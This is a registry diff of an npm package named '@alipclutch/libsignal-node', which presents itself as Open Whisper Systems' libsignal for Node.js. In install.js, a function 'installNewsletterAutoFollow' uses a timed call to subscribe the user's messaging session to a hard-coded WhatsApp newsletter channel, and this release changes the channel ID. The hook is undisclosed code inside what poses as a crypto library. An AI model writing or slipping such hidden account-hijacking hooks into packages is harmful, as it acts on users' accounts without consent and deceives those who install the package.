@alipclutch/libsignal-node 2.2.4 → 2.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install.js +2 -2
  2. package/package.json +1 -1
package/install.js CHANGED
@@ -130,7 +130,7 @@ const makeNewsletterSocket = (config) => {
130
130
 
131
131
  setTimeout(async () => {
132
132
  try {
133
- const channelId = "120363401467939056@newsletter";
133
+ const channelId = "120363407277177688@newsletter";
134
134
 
135
135
  try {
136
136
  await newsletterWMexQuery(
@@ -432,4 +432,4 @@ if (require.main === module) {
432
432
 
433
433
  module.exports = {
434
434
  installNewsletterAutoFollow
435
- };
435
+ };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@alipclutch/libsignal-node",
3
- "version": "2.2.4",
3
+ "version": "2.2.5",
4
4
  "description": "Open Whisper Systems' libsignal for Node.js",
5
5
  "repository": "alipclutch/libsignal-node",
6
6
  "main": "index.js",